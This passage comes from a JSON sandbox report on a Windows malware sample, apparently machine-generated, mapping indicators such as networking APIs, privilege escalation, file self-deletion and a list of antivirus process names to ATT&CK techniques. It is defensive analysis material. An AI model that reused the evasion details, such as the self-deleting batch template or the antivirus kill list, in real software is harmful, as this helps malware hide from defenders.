"attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-419", "type": 2, "relevance": 1, "name": "Contains ability to open a port and listen for incoming connection (API string)", "description": "Found reference to API \"setsockopt\" (Indicator: \"setsockopt\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")", "origin": "File/Memory", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-241", "type": 2, "relevance": 1, "name": "Contains ability to download a file from a URL (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-538", "type": 2, "relevance": 1, "name": "Contains ability to create a HTTP or FTP session (API string)", "description": "Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"%s %s HTTP/1.1Referer: %sHost: %sConnection: close\" (Indicator: \"HTTP/1.1\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"%s %s HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"InternetOpenA with parameter Mozilla/4.0 (compatible)\" (UID: 00000000-00005056)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-408", "type": 2, "relevance": 1, "name": "Contains ability to delete files", "description": "Observed string: \"@echo off%s > \"%s\"del \"%s\"\" (Indicator: \"\"del \") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n Observed string: \"@echo off%s > \"%s\"del \"%s\"del \"%s\"\" (Indicator: \"\"del \") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\drivers\\etc\\hosts\" (Indicator: \"\\drivers\\\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"\\Windows\\System32\\DriverStore\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005056.00000001.140381.00640000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstor.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005056.00000001.140381.006A5000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\drvindex.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005056.00000001.140381.006A5000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstrng.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005056.00000001.140381.006A5000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\FileRepository\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005056.00000001.140381.006A5000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infpub.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005056.00000001.140381.006DF000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstor.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005068.00000001.140461.00270000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\drvindex.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005068.00000001.140461.00270000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infstrng.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005068.00000001.140461.00270000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\FileRepository\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005068.00000001.140461.00270000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infpub.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005068.00000001.140461.002EB000.00000004.mdmp\")\n Found string \"\\drivers\\etc\\hosts\" (Indicator: \"\\drivers\\\"; Source: \"00000000-00005068.00000001.140461.0041B000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-230", "type": 2, "relevance": 1, "name": "Contains ability to delete registry key/value (API string)", "description": "Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"RegDeleteValueA\" (Indicator: \"RegDeleteValue\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"RegDeleteValueA\" (Indicator: \"RegDeleteValue\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"LookupPrivilegeValueA\" (Indicator: \"LookupPrivilegeValue\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"AdjustTokenPrivileges\" (Indicator: \"AdjustTokenPrivileges\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005056.00000000.139963.00423000.00000040.mdmp\")\n Found reference to API \"LookupPrivilegeValueA\" (Indicator: \"LookupPrivilegeValue\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"AdjustTokenPrivileges\" (Indicator: \"AdjustTokenPrivileges\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005068.00000000.140099.00423000.00000040.mdmp, 00000000-00005068.00000001.140461.00423000.00000040.mdmp\")\n Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005392.00000000.140409.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"RemoveDirectoryA\" (Indicator: \"RemoveDirectory\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"RemoveDirectoryA\" (Indicator: \"RemoveDirectory\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00005056.00000000.139963.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-134", "type": 2, "relevance": 3, "name": "Found anti-virus related strings names", "description": "Found string \"SymProxySvc\" (Indicator: \"symproxysvc\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"Norton Antivirus Server\" (Indicator: \"norton\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"NISUM\" (Indicator: \"nisum\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"NISSERV\" (Indicator: \"nisserv\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"navapsvc\" (Indicator: \"navapsvc\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"McShield\" (Indicator: \"mcshield\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"DefWatch\" (Indicator: \"defwatch\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"ccEvtMgr\" (Indicator: \"ccevtmgr\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"BlackICE\" (Indicator: \"blackice\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"AvSynMgr\" (Indicator: \"avsynmgr\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"AVPCC\" (Indicator: \"avpcc\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"AvgServ\" (Indicator: \"avgserv\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"persfw.exe\" (Indicator: \"persfw\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"NMain.exe\" (Indicator: \"nmain\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"NAVW32.exe\" (Indicator: \"navw32\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"NISUM.EXE\" (Indicator: \"nisum\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"NAVAPSVC.EXE\" (Indicator: \"navapsvc\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"Mpftray.exe\" (Indicator: \"mpftray\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"McShield.exe\" (Indicator: \"mcshield\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"LOCKDOWN2000.EXE\" (Indicator: \"lockdown2000\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"IAMSERV.EXE\" (Indicator: \"iamserv\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"IAMAPP.EXE\" (Indicator: \"iamapp\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"CCSETMGR.EXE\" (Indicator: \"ccsetmgr\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"ccEvtMgr.exe\" (Indicator: \"ccevtmgr\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"avpcc.exe\" (Indicator: \"avpcc\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"avgserv.exe\" (Indicator: \"avgserv\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"avgcc32.exe\" (Indicator: \"avgcc\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"avgcc32.exe\" (Indicator: \"avgcc32\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"apvxdwin.exe\" (Indicator: \"apvxdwin\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")\n Found string \"Lookout.exe\" (Indicator: \"lookout\"; File: \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\")", "origin": "File/Memory", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-406", "type": 2, "relevance": 1, "name": "Contains ability to shutdown system", "description": "Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" opened \"\\Device\\KsecDD\"\n \"dllconf.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-188", "relevance": 5, "name": "Calls APIs used for Remove Service", "description": "Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33]\n Observed import api \"DeleteService\" which can \"Deregister service in Service Control Manager database\" [Source: dllconf.exe]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"cmd.exe\" marked \"C:\\e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" for deletion\n \"cmd.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2585.bat\" for deletion\n \"cmd.exe\" marked \"C:\\dllconf.exe\" for deletion\n \"cmd.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2908.bat\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" with delete access\n \"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2585.bat\" with delete access\n \"cmd.exe\" opened \"C:\\dllconf.exe\" with delete access\n \"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2908.bat\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-579", "type": 2, "relevance": 1, "name": "Contains ability to retrieve remote user information", "description": "Observed string: \"FINGER %s\" (Indicator: \"finger \") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n Observed string: \"Go finger yourself\" (Indicator: \" finger \") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n Observed string: \"Get you finger out of there\" (Indicator: \" finger \") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n Observed string: \"Stick your finger somewhere else\" (Indicator: \" finger \") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n Observed string: \"FINGER\" (Indicator: \"finger\") in Source: e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\n Observed string: \"FINGER %s\" (Indicator: \"finger \") in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n Observed string: \"Go finger yourself\" (Indicator: \" finger \") in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n Observed string: \"Get you finger out of there\" (Indicator: \" finger \") in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n Observed string: \"Stick your finger somewhere else\" (Indicator: \" finger \") in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp\n Observed string: \"FINGER\" (Indicator: \"finger\") in Source: 00000000-00005068.00000001.140461.0041B000.00000080.mdmp", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-3", "relevance": 10, "name": "Timestamp in PE header is very old or in the future", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" claims program is from Thu Jan 1 15:30:08 1970\n \"dllconf.exe\" claims program is from Thu Jan 1 15:30:08 1970", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 